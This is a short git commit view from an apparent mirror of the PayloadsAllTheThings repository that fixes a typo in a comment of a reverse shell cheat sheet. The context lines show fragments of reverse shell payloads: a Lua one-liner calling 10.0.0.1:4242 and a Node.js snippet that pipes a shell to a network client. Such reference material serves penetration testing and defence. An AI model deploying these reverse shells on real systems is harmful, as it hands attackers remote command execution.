mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-31 15:37:26 +00:00
commit
fe1fa242ba
@ -343,7 +343,7 @@ lua5.1 -e 'local host, port = "10.0.0.1", 4242 local socket = require("socket")
|
|||||||
sh.stdout.pipe(client);
|
sh.stdout.pipe(client);
|
||||||
sh.stderr.pipe(client);
|
sh.stderr.pipe(client);
|
||||||
});
|
});
|
||||||
return /a/; // Prevents the Node.js application form crashing
|
return /a/; // Prevents the Node.js application from crashing
|
||||||
})();
|
})();
|
||||||
|
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user